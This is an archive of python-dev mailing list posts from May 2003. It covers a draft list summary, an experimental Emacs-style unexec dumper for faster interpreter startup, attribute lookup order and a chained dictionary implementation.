import unexec, sys

for m in sys.argv[2:]:
	if m[0] == "-":
		sys.modules[m[1:]] = None
		continue
	__import__(m)
	
for m in sys.modules.keys():
	mod = sys.modules[m]
	if mod is None:
		continue # negatively cached entry
	if not hasattr(mod, "__file__"):
		continue # builtin module
	if mod.__file__.endswith(".so"):
		raise RuntimeError, "Cannot dump with shared module %s" % m

unexec.dump(sys.argv[1], sys.executable)


/**********************************************************************/
/* unexecmodule.c (needs unexec() eg from unexelf.c)                  */
#include <Python.h>

extern void unexec (char *new_name, char *old_name, unsigned data_start, unsigned bss_start, unsigned entry_address);

static PyObject *dump_python(PyObject *self, PyObject *args) {
	char *filename, *symfile;
	if(!PyArg_ParseTuple(args, "ss", &filename, &symfile))
		return NULL;
	unexec(filename, symfile, 0, 0, (unsigned)Py_Main);
	_exit(99);
}

static PyMethodDef dump_methods[] = {
	{"dump", dump_python, METH_VARARGS,
		PyDoc_STR("dump(filename, symfile) -> None")},
	{NULL, NULL}
};

PyDoc_STRVAR(module_doc,
"Support for undumping the Python executable, a la Emacs");

PyMODINIT_FUNC
initunexec(void)
{
	Py_InitModule3("unexec", dump_methods, module_doc);
}

########################################################################
# Setup.local

# Edit this file for local setup changes
unexec unexecmodule.c unexelf.c
time timemodule.c
_socket socketmodule.c
_random _randommodule.c
math mathmodule.c
fcntl fcntlmodule.c


From drifty@alum.berkeley.edu  Mon May 19 02:38:24 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sun, 18 May 2003 18:38:24 -0700
Subject: [Python-Dev] python-dev Summary for 2003-05-01 through 2003-05-15
Message-ID: <3EC83590.1000306@ocf.berkeley.edu>

It's that time of the month again.

The only thing I would like help with this summary is if someone knows 
the attribute lookup order (instance, class, class descriptor, ...) off 
the top of their heads, can you let me know?  If not I can find it out 
by going through the docs but I figure someone out there has to know it 
by heart and any possible quirks (like whether descriptors take 
precedence over non-descriptor attributes).

I won't send this off until Wednesday.

----------------------

+++++++++++++++++++++++++++++++++++++++++++++++++++++
python-dev Summary for 2003-05-01 through 2003-05-15
+++++++++++++++++++++++++++++++++++++++++++++++++++++
This is a summary of traffic on the `python-dev mailing list`_ from May 
1, 2003 through May 15, 2003.  It is intended to inform the wider Python 
community of on-going developments on the list and to have an archived 
summary of each thread started on the list.  To comment on anything 
mentioned here, just post to python-list@python.org or 
`comp.lang.python`_ with a subject line mentioning what you are 
discussing. All python-dev members are interested in seeing ideas 
discussed by the community, so don't hesitate to take a stance on 
something.  And if all of this really interests you then get involved 
and join `python-dev`_!

This is the seventeenth summary written by Brett Cannon (going to grad 
school, baby!).

All summaries are archived at http://www.python.org/dev/summary/ .

Please note that this summary is written using reStructuredText_ which 
can be found at http://docutils.sf.net/rst.html .  Any unfamiliar 
punctuation is probably markup for reST_ (otherwise it is probably 
regular expression syntax or a typo =); you can safely ignore it, 
although I suggest learning reST; its simple and is accepted for `PEP 
markup`__.  Also, because of the wonders of programs that like to 
reformat text, I cannot guarantee you will be able to run the text 
version of this summary through Docutils_ as-is unless it is from the 
original text file.

__ http://www.python.org/peps/pep-0012.html

The in-development version of the documentation for Python can be found 
at http://www.python.org/dev/doc/devel/ .  To view files in the Python 
CVS online, go to http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/python/ .

.. _python-dev: http://www.python.org/dev/
.. _python-dev mailing list: 
http://mail.python.org/mailman/listinfo/python-dev
.. _comp.lang.python: http://groups.google.com/groups?q=comp.lang.python
.. _Docutils: http://docutils.sf.net/
.. _reST:
.. _reStructuredText: http://docutils.sf.net/rst.html

.. contents::


.. _last summary: 
http://www.python.org/dev/summary/2003-04-16_2003-04-30.html


======================
Summary Announcements
======================
So, to help keep my sanity longer than my predecessors I am no longer 
going to link to individual modules in the stdlib nor to files in CVS. 
It sucks down a ton of time and at least Raymond Hettinger thinks it 
clutters the summaries.

Along the lines of the look of the summaries, I am trying out a new 
layout for listing splinter threads.  If you have a preference in 
comparison to the old style or new style speak up and let me know.


==========================
`Dictionary sparseness`__
==========================
__ http://mail.python.org/pipermail/python-dev/2003-May/035295.html

Splinter threads:
     `Where'd my memory go?`__

__ http://mail.python.org/pipermail/python-dev/2003-May/035340.html

After all the work Raymond Hettinger did on dictionaries he suggested 
two possible methods on dictionaries that would allow the programmer to 
control how sparse (at what point a dictionary doubles its size in order 
to lower collisions) a dictionary should be.  Both got shot down on the 
grounds that most people would not know how to properly use the methods 
and are more likely to shoot themselves in the foot than get any gain 
out of them.

There was also a bunch of talk about the "old days" when computers were 
small and didn't measure the amount of RAM they had in megabytes unless 
they were supercomputers.

But then the discussion changed to memory footprints.  There was some 
mention of the extra output one can get from a special build (all listed 
in Misc/SpecialBuilds.txt) such as Py_DEBUG.  But the issue at hand is 
that there  int, float, and frameobject free lists which keep alive any 
and all created constant values (although the frameobject is bounded in 
size).  This is why if you do ``range(2000000)`` you won't get the 
memory allocated for all of those integers back until you shut down the 
interpreter.

This led to the suggestion of just doing away with the free lists. 
There would be a performance hit since numerical constants would have to 
be reallocated if they are constantly created deleted, and then created 
again.  It was also suggested to limit the size of the free lists and 
basically chop off the tail if they grew too large.  But it turns out 
that the memory is allocated in large blocks that are chopped up by 
intobject.c.  Thus there is no way to just get rid of a few entries 
without taking out a whole block of objects.


=================================
`__slots__ and default values`__
=================================
__ http://mail.python.org/pipermail/python-dev/2003-May/035575.html

Ever initialized a variable in a class that uses __slots__?  If you have 
you may have discovered that the variable becomes read-only::

     class Parrot(object):
         __ slots__ = ["dead"]
         dead = True

     bought_bird = Parrot()
     bought_bird.dead = False

That raises an AttributeError saying that 'dead' is read-only.  This 
occurs because the class attribute "overrides the descriptor created by 
__slots__" and "now appears read-only because there is no instance dict" 
thanks to __slots__ suppressing the creation of one.

But don't go using this trick!  If you want read-only attributes use a 
property with its set function set to raise an exception.  If you want 
to avoid this problem just do your initialization of attributes in the 
__init__ call.  You can also include __dict__ in __slots__ and then your 
instances will have a fully functioning instance __dict__ (new in 2.3).

The key thing to come away with this twofold.  One is the resolution 
order of attribute lookup which is XXX.  The other is that __slots__ is 
meant purely to cut down on memory usage, nothing more.  Do not start 
abusing it with little tricks like the one mentioned above or Guido will 
pull it from the language.


=========
Quickies
=========

`Draft of dictnotes.txt`__
     After all the work Raymond Hettinger did to try to speed up 
dictionaries, he wrote a text file documenting everything he tried and 
learned.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035246.html

`_socket efficiencies ideas`__
     This thread was first covered in the `last summary`_.
     Guido discovered that the socket module used to special-case 
receiving a numeric address in order to skip any overhead in bother to 
resolve the IP address.  It has been put back into the code.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035248.html

`Demos and Tools in binary distributions`__
     Jack Jansen asked where other platform-specific binary 
distributions of Python put the Demo and Tools directories.  The thread 
ended with the winning solution be putting them in 
/Applications/Python2.3/Extras/ so they are a level below the root 
directory to prevent newbies from getting overwhelmed by the code there 
since it is not all simple.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035252.html

`updated notes about building bsddb185 module`__
     Splinter threads:
       - `bsddb185 module changes checked in`__

     Someone wanted the bsddb185 module back.  Initially it was 
suggested to build that module as bsddb if the new bsddb3 module could 
not be built (since that module currently gets named bsddb).  The final 
outcome was that bsddb185 will get built under certain conditions and be 
named bsddb185.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035257.html
__ http://mail.python.org/pipermail/python-dev/2003-May/035409.html

`broke email date parsing`__
     ... but it got fixed.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035259.html

`New thread death in test_bsddb3`__
     This is a continuation from the `last summary`_.
     You can create as many thread states as you like as long as you 
only use one at any given point.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035230.html

`removing csv directory from nondist/sandbox - how?`__
     Joys of CVS.  You can never removed a directory unless you have 
direct access the the physical directory on the CVS root server.  The 
best you can do is to empty the directory (make sure to get files named 
".*") and assume people will do an ``cvs update -dP``.  You can also 
remove the empty directories locally by hand if you like.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035270.html

`posixmodule.c patch to support forkpty`__
     A patch was sent to python-dev incorrectly that tries to get 
os.forkpty to work on more platforms.  It is now up on SourceForge_ and 
it is `patch #732401 <http://www.python.org/sf/732401>`__.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035281.html
.. _SourceForge: http://www.sf.net/projects/python

`Timbot?`__
     There is a real Timbot robot out there: 
http://www.cse.ogi.edu/~mpj/timbot/#Programming .

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035287.html

`optparse docs need proofreading`__
     What the 'subject' says.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035288.html

`heaps`__
     This is a continuation of a thread from the `last summary`_.
     Lots of talk about heaps, priority queues, and other theoretical 
algorithm talk.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035343.html

Weekly Python Bug/Patch Summary
     First one ended on `2003-05-04 
<http://mail.python.org/pipermail/python-dev/2003-May/035292.html>`__. 
The second one ended on `2003-05-11 
<http://mail.python.org/pipermail/python-dev/2003-May/035537.html>`__.

`Distutils using apply`__
     Since Distutils must be kept backwards-compatible (as stated in 
`PEP 291`_), it still uses 'apply'.  This raises a PendingDeprecation 
warning which is normally silent unless you want all warnings raised.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035293.html
.. _PEP 291: http://www.python.org/peps/pep-0291.html

`How to test this?`__
     Dummy files can be checked into Lib/test .

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035318.html

`Windows installer request...`__
     Someone wanted the default drive on the Windows installer to be 
your boot drive and not C.  It has been fixed.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035319.html

`Election of Todd Miller as head of numpy team`__
     What the 'subject' says.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035326.html

`Startup time`__
     Guido noticed that although Python 2.3 is already faster than 2.2, 
its startup time is slower.  It looks like it is from failing stat 
calls.  Speeding this all up is still being worked on.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035359.html

`testing with and without pyc files present`__
     Why does ``make test`` delete all .pyc and .pyo files before 
running the regression tests?  To act as a large scale test of the 
marshaling code.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035362.html

`pyconfig.h not regenerated by "config.status --recheck"`__
     ``./config.status --recheck`` doesn't work too well.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035366.html

`Python Technical Lead, New York, NY - 80-85k`__
     Wrong place for a job announcement.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035369.html

`RedHat 9 _random failure under -pg`__
     gcc ain't perfect.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035386.html

`SF CVS offline`__
     ... but it came back up.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035398.html

`Microsoft speedup`__
     It was noticed that turning on more aggressive inlining for VC6 
sped up pystone by 2.5% while upping the executable size by 13%.  Tim 
Peters noted that "A couple employers ago, we disabled all magical 
inlining options, because sometimes they made critical loops faster, and 
sometimes slower, and you couldn't guess which as the code changed".

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035454.html

`Relying on ReST in the core?`__
     Although docutils_ is not in the core yet, it is being used more 
and more.  But is this safe?  As long as it's kept conservative and not 
required anywhere, yes.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035465.html

`Make _strptime only time.strptime implementation?`__
     As long as no one complains to loudly by 2.3b2, _strptime.strptime 
will become the exclusive implementation of time.strptime. 
_strptime.strptime also learned how to recognize UTC and GMT as timezones.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035481.html

`Building Python with .NET 2003 SDK`__
     Logistix was nice enough to try to build Python on .NET 2003 and 
post notes on how he did it at 
http://www.cathoderaymission.net/~logistix/python/buildingPythonWithDotNet.html 
.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035485.html

`local import cost`__
     Trying to find out how the cost of doing imports in the local 
namespace costs compared to doing it at the global level.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035486.html

`Subclassing int?`__
     This thread started `two summaries ago 
<http://www.python.org/dev/summary/2003-04-01_2003-04-15.html>`__.
     Subclassing int to make it mutable just doesn't work.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035500.html

`patch 718286`__
     The patch was applied.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035538.html

`Need some patches checked`__
     Some patches needed to be cleared by more senior members of 
python-dev since they were being handled by the young newbie of the 
group.  Jeremy Hylton also mentioned that a full-scale refactoring of 
urllib2 is needed and would allow the closure of some patches.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035540.html

`os.path.walk() lacks 'depth first' option`__
     Splinter threads:
       - `os.walk() silently ignores errors`__

     This thread started in the `last summary`_.
     LookupError exists and subclasses both IndexError and KeyError. 
Rather handy when you don't care whether you are dealing with a list or 
dictionary but do care if what you are looking for doesn't exist.
     os.walk also gained a parameter argument called onerror that takes 
a function that will be passed any exception raised by os.walk as it 
does its thing; previously os.walk ignored all errors.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035546.html
__ http://mail.python.org/pipermail/python-dev/2003-May/035574.html

`Random SF tracker ettiquete questions`__
     Does python-dev care about dealing with RFEs?  Sort of; it isn't a 
priority like patches and bugs, but cleaning them out once in a while 
doesn't hurt.  Is it okay to assign a tracker item to yourself even if 
it is already assigned to another person?  If the original person it was 
assigned to is not actively working on it, then yes.  When should 
someone be put into the Misc/ACKS file?  When they have done anything 
that required some amount of brain power (yes, this includes one-line 
patches).

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035549.html

`codeop: small details (Q); commit priv request`__
     Some issues with codec were worked out and Samuele Pedroni got 
commit privileges.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035556.html

`Python 2.3b1 _XOPEN_SOURCE value from configure.in`__
     Python.h should always be included in extension modules first 
before any other header files.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035560.html

`Inplace multiply`__
     Someone thought they had found a bug.  Michael Hudson thought it 
was an old bug that was fixed.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035591.html

`sf.net/708007: expectlib.py telnetlib.py split`__
     A request for people to look at http://www.python.org/sf/708007 .

   .. __: http://mail.python.org/pipermail/python-dev/2003-May/035605.html

`Simple dicts`__
     Tim Peters suggested that if someone wanted something to do they 
could try re-implementing dicts to using chaining instead of open 
addressing.  It turns out Damien Morton (who did a ton of work trying to 
optimize Python's bytecode) is  working on an immplementation.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035625.html

`python/dist/src/Lib warnings.py,1.19,1.20`__
     As part of the attempts to speed up startup time, the attempted 
elimination of the required import of the re module came up.  This 
thread brought up the question as to whether it was desired to be able 
to pass a regexp as an argument for the -W command-line option for Python.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035616.html

`[PEP] += on return of function call result`__
     You  can't assign on the return value of a method calls.

   .. __: http://mail.python.org/pipermail/python-dev/2003-May/035640.html

`Vacation; Python 2.2.3 release.`__
     Guido is going on vacation and won't be back until May 26.  He 
would like Python 2.2.3 to be out shortly after he gets back, although 
if it comes out while he is gone he definitely won't complain.  =)  You 
can get an anonymous CVS checkout of the 2.2 maintenance branch by 
executing ``cvs -d 
:pserver:anonymous@cvs.python.sourceforge.net:/cvsroot/python checkout 
-d <dir to store in> -r release22-maint python`` and changing the <> 
note to be the directory you want to put your CVS copy into.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035642.html

`MS VC 7 offer`__
     At `Python UK`_ Guido was offered free copies of `Visual C++ 2003`_ 
by the project lead of VC, Nick Hodapp, for key developers (a free copy 
of the compiler is available at 
http://www.msdn.microsoft.com/netframework/downloads/howtoget.aspx ). 
This instantly led to the discussion of whether Python's binary 
distribution for Windows should be moved off of VC 6 to 7.  The biggest 
issue is that apparently passing FILE * values across library boundaries 
breaks code.  The final decision seemed to be that Tim, Guido, and 
developers of major extensions should get free copies.  Then an end date 
of when Python will be moved off of VC 6 and over to 7 will be decided. 
  None of this will affect Python 2.3 .

     This thread was 102 emails long.  I don't use Windows.  This was 
painful.

.. __: http://mail.python.org/pipermail/python-dev/2003-May/035375.html
.. _Python UK: http://www.python-uk.org/
.. _Visual C++ 2003: http://msdn.microsoft.com/visualc/



From dberlin@dberlin.org  Mon May 19 02:56:58 2003
From: dberlin@dberlin.org (Daniel Berlin)
Date: Sun, 18 May 2003 21:56:58 -0400
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519012212.GA10317@unpythonic.net>
Message-ID: <2D129034-899D-11D7-BB2B-000A95A34564@dberlin.org>

On Sunday, May 18, 2003, at 09:22  PM, Jeff Epler wrote:

> On Fri, May 16, 2003 at 03:09:31PM -0400, Barry Warsaw wrote:
>> Skip, you're going about this all wrong.  We already have the 
>> technology
>> to start Python up blazingly fast.  All you have to do <wink> is port
>> XEmacs's unexec code.  Then you load up Python with all the modules 
>> you
>> think you're going to need, unexec it, then the next time it starts up
>> like lightening.  Disk space is cheap!
>
> I gave it a try, starting with 2.3b1 and using FSF Emacs 21.3's 
> unexelf.c.

XEmacs has a portable undumper, IIRC.

> An unexec'd binary loads faster than 'python -S -c pass', and seems to
> work properly with two exceptions and a few limitations.
>
> The only change to Python is in main(): I use mallopt() to force all
> allocations to go through brk() instead of through mmap(), because 
> unexec
> doesn't support mmap'd memory.  I also used Modules/Setup.local to make
> some normally-shared modules not shared (for the same reason).
>
> dump.py loads the requested modules (-<module> forces the module to 
> *not*
> be found) and then calls unexec(), producing a new binary with the 
> given
> name.
>
> $ time ./python -S -c pass         # best 'real' of 5 runs
> real    0m0.054s
> user    0m0.040s
> sys     0m0.010s
> $ time ./python -c 'import cgi'    # best 'real' of 5 runs
> real    0m0.127s
> user    0m0.110s
> sys     0m0.010s
> $ strace -e open ./python -c 'import cgi' 2>&1 | grep -v ENOENT | wc -l
>      88
> $ ./python dump.py cgipython -_ssl cgi
> $ time ./cgipython -c 'import cgi' # best 'real' of 5 runs
> real    0m0.039s
> user    0m0.020s
> sys     0m0.020s
> $ strace -e open ./cgipython -c 'import cgi' 2>&1 | grep -v ENOENT | 
> wc -l
>       9
> $ ./python dump.py dython
> -rwxrwxr-x    1 jepler   jepler    4983713 May 18 19:42 cgipython
> -rwxrwxr-x    1 jepler   jepler    3603737 May 18 19:39 python
> -rwxrwxr-x    1 jepler   jepler    4541345 May 18 19:55 dython
>
> (a minimal unexec'd python is about 90k bigger than the regular Python
> binary)
>
> I'm running the test suite now .. it hangs in test_signal for some 
> reason.
> test_thread seems to hang too, which may be related.  (but 
> test_threading
> completes?)
>
> $ ./dython Lib/test/regrtest.py -x test_signal -x test_thread
> [...]
> 225 tests OK.
> 26 tests skipped:
>     test_aepack test_al test_bsddb3 test_bz2 test_cd test_cl
>     test_curses test_email_codecs test_gl test_imgfile
>     test_linuxaudiodev test_macfs test_macostools test_nis
>     test_normalization test_ossaudiodev test_pep277 test_plistlib
>     test_scriptpackages test_socket_ssl test_socketserver
>     test_sunaudiodev test_timeout test_urllibnet test_winreg
>     test_winsound
> 1 skip unexpected on linux2:
>     test_bz2
>
> Well, if it worked right it'd sure be interesting.  OTOH, unexelf.c is
> GPL'd and there's also the nightmare of different unex* for different
> platforms.
>
>
Like I said, xemacs has a "portable" undumper.
--Dan



From aahz@pythoncraft.com  Mon May 19 02:58:22 2003
From: aahz@pythoncraft.com (Aahz)
Date: Sun, 18 May 2003 21:58:22 -0400
Subject: [Python-Dev] Attribute lookup (was Re: python-dev Summary for 2003-05-01 through 2003-05-15)
In-Reply-To: <3EC83590.1000306@ocf.berkeley.edu>
References: <3EC83590.1000306@ocf.berkeley.edu>
Message-ID: <20030519015822.GA10320@panix.com>

[Normally I send my corrections to Brett privately, but since I'm taking
a whack at attribute lookup, I figured this ought to be public.]

On Sun, May 18, 2003, Brett C. wrote:
>
> The only thing I would like help with this summary is if someone knows 
> the attribute lookup order (instance, class, class descriptor, ...) off 
> the top of their heads, can you let me know?  If not I can find it out 
> by going through the docs but I figure someone out there has to know it 
> by heart and any possible quirks (like whether descriptors take 
> precedence over non-descriptor attributes).

This gets real tricky.  For simple attributes of an instance, the order
is instance, class/type, and base classes of the class/type (but *not*
the metaclass).  However, method resolution of the special methods goes
straight to the class.  Finally, if an attribute is found on the
instance, a search goes through the hierarchy to see whether a set
descriptor overrides (note specifically that it's a set descriptor;
methods are implemented using get descriptors).

I *think* I have this right, but I'm sure someone will correct me if I'm
wrong.

>     LookupError exists and subclasses both IndexError and KeyError. 
> Rather handy when you don't care whether you are dealing with a list or 
> dictionary but do care if what you are looking for doesn't exist.
>     os.walk also gained a parameter argument called onerror that takes 
> a function that will be passed any exception raised by os.walk as it 
> does its thing; previously os.walk ignored all errors.

"and has as subclasses"
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From greg@cosc.canterbury.ac.nz  Mon May 19 03:05:16 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 19 May 2003 14:05:16 +1200 (NZST)
Subject: Unifying modules and classes? (Re: [Python-Dev] a strange case)
In-Reply-To: <200305161345.25415.troy@gci.net>
Message-ID: <200305190205.h4J25GJ27449@oma.cosc.canterbury.ac.nz>

Troy Melhase <troy@gci.net>:

> Just last night, it occurred to me that modules could be made callable via 
> subclassing. "Why in the world would you want callable modules you ask?"

This has given me a thought concerning the naming problem that arises
when you have a module (e.g. socket) that exists mainly to hold a
single class. What if there were some easy way to make the class and
the module the same thing?

I'm thinking about having an alternative filename suffix, such as
".cls", whose contents is treated as though it were inside a class
statement, and then the resulting class is put into sys.modules as
though it were a module.

Not sure how you'd specify base classes -- maybe a special
__bases__ class attribute or something.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From pje@telecommunity.com  Mon May 19 03:18:43 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Sun, 18 May 2003 22:18:43 -0400
Subject: [Python-Dev] Attribute lookup (was Re: python-dev Summary
 for 2003-05-01 through 2003-05-15)
In-Reply-To: <20030519015822.GA10320@panix.com>
References: <3EC83590.1000306@ocf.berkeley.edu>
 <3EC83590.1000306@ocf.berkeley.edu>
Message-ID: <5.1.0.14.0.20030518220635.01f09ce0@mail.telecommunity.com>

At 09:58 PM 5/18/03 -0400, Aahz wrote:
>[Normally I send my corrections to Brett privately, but since I'm taking
>a whack at attribute lookup, I figured this ought to be public.]
>
>On Sun, May 18, 2003, Brett C. wrote:
> >
> > The only thing I would like help with this summary is if someone knows
> > the attribute lookup order (instance, class, class descriptor, ...) off
> > the top of their heads, can you let me know?  If not I can find it out
> > by going through the docs but I figure someone out there has to know it
> > by heart and any possible quirks (like whether descriptors take
> > precedence over non-descriptor attributes).
>
>This gets real tricky.  For simple attributes of an instance, the order
>is instance, class/type, and base classes of the class/type (but *not*
>the metaclass).  However, method resolution of the special methods goes
>straight to the class.  Finally, if an attribute is found on the
>instance, a search goes through the hierarchy to see whether a set
>descriptor overrides (note specifically that it's a set descriptor;
>methods are implemented using get descriptors).
>
>I *think* I have this right, but I'm sure someone will correct me if I'm
>wrong.

Here's the algorithm in a bit more detail:

1. First, the class/type and its bases are searched, checking dictionaries 
only.

2. If the object found is a "data descriptor"  (i.e. has a type with a 
non-null tp_descr_set pointer, which is closely akin to whether the 
descriptor has a '__set-_' attribute), then the data descriptor's __get__ 
method is invoked.

3. If the object is not found, or not a data descriptor, the instance 
dictionary is checked.  If the attribute isn't in the instance dictionary, 
then the descriptor's __get__ method is invoked (assuming a descriptor was 
found).

4. Invoke __getattr__ if present.

(Note that replacing __getattribute__ *replaces* this entire algorithm.)

Also note that special methods are *not* handled specially here.  The 
behavior Aahz is referring to is that slots (e.g. tp_call) on new-style 
types do not retrieve an instance attribute; they are based purely on 
class-level data.  So, although you *can* override the values in an 
instance, they have no effect on the class behavior.  E.g.:

 >>> class Foo(object):
         def __call__(self,*args):
                 print "foo",args


 >>> f=Foo()
 >>> f.__call__ = 'spam'
 >>> f.__call__
'spam'
 >>> f()
foo ()
 >>>

Notice that the behavior of the instance '__call__' attribute does not 
affect the class-level definition of '__call__'.

To recast the algorithm as a precedence order:

1. Data descriptors (ones with tp_descr_set/__set__) found in the type 
__mro__  (note that this includes __slots__, property(), and custom 
descriptors)

2. Instance attributes found in ob.__dict__

3. Non-data descriptors, such as methods, or any other object found in the 
type __mro__ under that name

4. __getattr__




From jepler@unpythonic.net  Mon May 19 03:46:18 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Sun, 18 May 2003 21:46:18 -0500
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519012212.GA10317@unpythonic.net>
References: <r01050400-1025-E9E6CB087FF411D7AF4B003065D5E7E4@[10.0.0.23]> <1052927757.7258.38.camel@slothrop.zope.com> <3EC51B5C.2080307@lemburg.com> <16069.13640.892428.185711@montanaro.dyndns.org> <1053112171.2342.7.camel@barry> <20030519012212.GA10317@unpythonic.net>
Message-ID: <20030519024618.GB10317@unpythonic.net>

On Sun, May 18, 2003 at 08:22:14PM -0500, Jeff Epler wrote:
> I'm running the test suite now .. it hangs in test_signal for some reason.  
> test_thread seems to hang too, which may be related.  (but test_threading
> completes?)

If I make another change, to call PyOS_InitInterrupts just after
Py_Initialize in Modules/main.c, these two tests pass.

Py_Initialize believes it's already initialized so returns without doing
anything.  But unexec doesn't preserve signal handlers, so this must be
re-done explicitly.

Jeff


From barry@wooz.org  Mon May 19 04:28:08 2003
From: barry@wooz.org (Barry Warsaw)
Date: Sun, 18 May 2003 23:28:08 -0400
Subject: Using emacs' unexec to speed Python startup (was Re: [Python-Dev] Startup time)
In-Reply-To: <20030519024618.GB10317@unpythonic.net>
Message-ID: <E904818D-89A9-11D7-B165-003065EEFAC8@wooz.org>

On Sunday, May 18, 2003, at 10:46 PM, Jeff Epler wrote:

> On Sun, May 18, 2003 at 08:22:14PM -0500, Jeff Epler wrote:
>> I'm running the test suite now .. it hangs in test_signal for some 
>> reason.
>> test_thread seems to hang too, which may be related.  (but 
>> test_threading
>> completes?)
>
> If I make another change, to call PyOS_InitInterrupts just after
> Py_Initialize in Modules/main.c, these two tests pass.
>
> Py_Initialize believes it's already initialized so returns without 
> doing
> anything.  But unexec doesn't preserve signal handlers, so this must be
> re-done explicitly.

Y'know, I wrote that as a joke, and it's quite FAST that you've taken t 
and made it real.  Very cool too, congrats!

Since it looks like you implemented the meat of it as a module, I 
wonder if it couldn't be cleaned up (with the interrupt reset either 
pulled in the extension or exposed to Python) and added to Python 2.3?

-Barry



From barry@python.org  Mon May 19 04:57:00 2003
From: barry@python.org (Barry Warsaw)
Date: Sun, 18 May 2003 23:57:00 -0400
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <16070.45480.640314.144944@montanaro.dyndns.org>
Message-ID: <F13FC8F7-89AD-11D7-B165-003065EEFAC8@python.org>

Yee haw!  All expected tests pass for me w/ Python 2.3cvs on OSX 10.2.6.

Gonna try Python 2.2.3 next.

-Barry



From barry@python.org  Mon May 19 08:04:02 2003
From: barry@python.org (Barry Warsaw)
Date: Mon, 19 May 2003 03:04:02 -0400
Subject: [Python-Dev] test_bsddb185 failing under OS X
In-Reply-To: <F13FC8F7-89AD-11D7-B165-003065EEFAC8@python.org>
Message-ID: <12146C5B-89C8-11D7-B165-003065EEFAC8@python.org>

On Sunday, May 18, 2003, at 11:57 PM, Barry Warsaw wrote:

> Yee haw!  All expected tests pass for me w/ Python 2.3cvs on OSX 
> 10.2.6.
>
> Gonna try Python 2.2.3 next.

Looks good.
-Barry



From dmorton@bitfurnace.com  Mon May 19 09:32:32 2003
From: dmorton@bitfurnace.com (damien morton)
Date: Mon, 19 May 2003 04:32:32 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEPHEFAB.tim.one@comcast.net>
Message-ID: <000001c31de1$322a0e90$6401a8c0@damien>

Well, I implemented the chained dict, and against stock 2.3b1 I am
seeing about a 4-5% speedup on pystone, and about a 10-15% speedup on a
simplistic largedict benchmark which inserts 200K strings, retrieves
them once, and then removes them one at a time. Suggestions for more
appropriate benchmarks are, as usual, always welcome. (raymond - if you
have a suite of benchmarks specifically for dicts, I would love to have
access to them). Move-to-front chains are implemented, and a benchmark
that excerised skewed access patterns would be great.

Memory usage is more than the current implementation, but is highly
tunable. You can adjust the ratio of dictentry structs to first
pointers. My simple largedict benchmark performed best with an 8:16
ratio, while the pystone benchmark performed best with a 6:16 ratio.
Moving up to a 100:16 ratio on the largedict benchmark adversly affected
performance by about 10%. It may pay off to schedule the sparsity ratio
according to the size of the dict. Also, because performance and memory
usage varies roughly linearly with sparsity, it may be a less dangerous
candidate for being user settable. Where fail-fast characteristics are
required, sparsity may be highly desireable. 

I need to address Tim's concerns about the poor hash function used for
python integers, but I think this can be addressed easily enough. I
would welcome some guidance about what hash functions need to be
addressed though. Is it just integers? (theres a great article on
integer hash functions at www.cris.com/~Ttwang/tech/inthash.htm)

If anyone wants to try out the code, please download
www.bitfurnace.com/python/dict.zip

Im still trying to get the above code to pass the regression tests. Most
things go smoothly, but some tests throw out this kind of error:
"unknown scope for self in test_len(103) in C:\Documents and
Settings\Administrator\Desktop\python\Python-2.3b1\lib\test\test_builtin
.py
symbols: {}
locals: {}
globals: {}
"
Still trying to track down the source of this error. No idea why
symbols, locals and globals would all be empty at this point though.

Comments, suggestions, etc welcome.

- Damien Morton



